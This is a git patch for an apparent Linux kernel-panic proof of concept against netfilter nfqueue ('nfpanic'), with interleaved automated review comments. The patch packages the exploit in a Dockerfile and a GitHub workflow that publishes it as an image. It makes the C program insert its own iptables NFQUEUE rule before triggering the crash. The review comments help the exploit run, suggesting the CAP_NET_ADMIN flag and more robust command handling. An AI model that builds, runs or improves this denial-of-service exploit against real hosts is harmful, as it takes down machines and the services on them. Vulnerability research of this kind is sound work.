From 3bd11b1f2e11f9077471fe187f275e62a348ed40 Mon Sep 17 00:00:00 2001
From: Domingo Dirutigliano
Date: Thu, 7 Sep 2023 12:06:17 +0200
Subject: [PATCH] unprivilaged poc

---
 .github/workflows/docker-image.yml | 53 ++++++++++++++++++++++++++++++
 Dockerfile | 9 +++++
 panic6.c | 19 +++++++----
 3 files changed, 74 insertions(+), 7 deletions(-)
 create mode 100644 .github/workflows/docker-image.yml
 create mode 100644 Dockerfile

diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml
new file mode 100644
index 0000000..9026c78
--- /dev/null
+++ b/.github/workflows/docker-image.yml
@@ -0,0 +1,53 @@
+name: Create and publish a Docker image
+
+on:
+  release:
+    types:
+      - published
+
+env:
+  REGISTRY: ghcr.io
+  IMAGE_NAME: ${{ github.repository }}
+
+jobs:
+  build-and-push-image:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      packages: write
+
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@v3
+
+      - name: Set up QEMU
+        uses: docker/setup-qemu-action@master
+        with:
+          platforms: all
+
+      - name: Set up Docker Buildx
+        id: buildx
+        uses: docker/setup-buildx-action@master
+
+      - name: Log in to the Container registry
+        uses: docker/login-action@v2
+        with:
+          registry: ${{ env.REGISTRY }}
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: Extract metadata (tags, labels) for Docker
+        id: meta
+        uses: docker/metadata-action@v4
+        with:
+          images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}
+
+      - name: Build and push Docker image
+        uses: docker/build-push-action@v3
+        with:
+          context: .
+          builder: ${{ steps.buildx.outputs.name }}
+          platforms: linux/amd64,linux/arm64
+          push: true
+          tags: ${{ steps.meta.outputs.tags }}
+          labels: ${{ steps.meta.outputs.labels }}
\ No newline at end of file
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..2ac0bf0
--- /dev/null
+++ b/Dockerfile
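Review bot: `uses: docker/setup-qemu-action@master` and `uses: docker/setup-buildx-action@master` pull whatever is on those projects' default branch at run time, so a compromised or merely broken upstream commit flows straight into an image this workflow publishes to ghcr.io on every release. Pin both to a released tag, or better to a full commit SHA with the tag in a trailing comment, as the other steps at least do with `@v2`/`@v3`/`@v4`; e.g. `uses: docker/setup-qemu-action@<40-char-sha> # vN` and the same for buildx. The `permissions` block is already scoped to `contents: read` / `packages: write`, which is the right shape for this job.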
@@ -0,0 +1,9 @@
+FROM debian
+
+RUN apt-get update
+RUN apt-get install -y libnetfilter-queue-dev libmnl-dev libnfnetlink-dev iptables gcc
+WORKDIR /exploit
+COPY panic6.c panic6.c
+
+RUN cc panic6.c -o nfpanic -lmnl -lnetfilter_queue
+CMD ["./nfpanic"]
\ No newline at end of file
diff --git a/panic6.c b/panic6.c
index 754d840..7b8cc59 100644
--- a/panic6.c
+++ b/panic6.c
@@ -33,6 +33,7 @@ int socket_conn(uint16_t port)
     // connect the client socket to server socket
     connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
 
+    return sockfd;
 }
 
 int main(int argc, char *argv[])
@@ -71,14 +72,17 @@ int main(int argc, char *argv[])
         perror( "mnl_socket_send" );
         exit(EXIT_FAILURE);
     }
-
-    printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num);
-    puts("Press ENTER to contiune (and panic)");
-    getchar();
+
+    puts("[*] Linking the nfqueue to a real connection through iptables");
+    char cmd[200];
+    sprintf(cmd, "iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num);
+    if (system(cmd) != 0) {
+        perror( "system" );
+        exit(EXIT_FAILURE);
+    }
 
     puts("[*] Sending a connection packet to nfqueue");
     socket_conn(1337);
-
     puts("[*] Waiting for a packet in the nfqueue");
     if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1)
     {
@@ -97,8 +101,9 @@ int main(int argc, char *argv[])
         perror( "mnl_socket_send" );
         exit(EXIT_FAILURE);
     }
 
-    puts("[*] Are you still alive?");
-
+
+    puts("[*] Are you still alive? Probably your kernel is not vulnerable :(");
+    return EXIT_SUCCESS;
 }
 
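Review bot: `FROM debian` floats on the `latest` tag and `RUN apt-get update` sits in its own layer, so rebuilds pick up an arbitrary base image while Docker may reuse a stale package index for the `apt-get install` layer; pin the base (`FROM debian:bookworm-slim` or a digest) and fold the two into one layer, `RUN apt-get update && apt-get install -y --no-install-recommends libnetfilter-queue-dev libmnl-dev libnfnetlink-dev iptables gcc && rm -rf /var/lib/apt/lists/*`. Nothing in the file records that `./nfpanic` shells out to `iptables` and opens an nfnetlink socket, both of which need CAP_NET_ADMIN in the container's network namespace, so a plain `docker run` fails at the iptables step; a header comment such as `# Run with: docker run --cap-add=NET_ADMIN <image>` would save the next person that round-trip. Going by the program's name and its final "Are you still alive?" message this looks like a kernel-panic PoC; if so, the same comment should warn that a successful run takes down the host kernel, not just the container.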
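Review bot: `if (system(cmd) != 0) { perror( "system" ); ... }` reports the wrong thing: system() returns the shell's wait status and sets errno only when it returns -1, so when iptables itself fails (most likely because CAP_NET_ADMIN is missing) the user sees `system: Success` or a stale errno rather than the iptables exit code. Decode the status with WIFEXITED/WEXITSTATUS (`<sys/wait.h>`, add the include if the file lacks it) and keep perror() for the -1 path only. The `sprintf` into `char cmd[200]` happens to fit for any int `queue_num`, but `snprintf(cmd, sizeof cmd, ...)` with a truncation check is the form to use for a buffer that feeds a shell, and the trailing `\n` in the format string serves no purpose. The rule this hunk adds is never removed, so if the kernel survives it keeps diverting port-1337 traffic into a queue nobody reads; a matching `iptables -t mangle -D PREROUTING ...` before `return EXIT_SUCCESS` would undo it. main() starts and ends outside this hunk.
```c
    puts("[*] Linking the nfqueue to a real connection through iptables");
    char cmd[200];
    int len = snprintf(cmd, sizeof cmd,
                       "iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d",
                       queue_num);
    if (len < 0 || (size_t)len >= sizeof cmd) {
        fputs("[-] iptables command does not fit in buffer\n", stderr);
        exit(EXIT_FAILURE);
    }
    int status = system(cmd);
    if (status == -1) {
        perror("system");               /* errno is meaningful only on -1 */
        exit(EXIT_FAILURE);
    }
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        fprintf(stderr, "[-] iptables failed (wait status 0x%x); is CAP_NET_ADMIN available?\n", status);
        exit(EXIT_FAILURE);
    }
    /* … unchanged: socket_conn(1337) and the nfqueue receive path … */
```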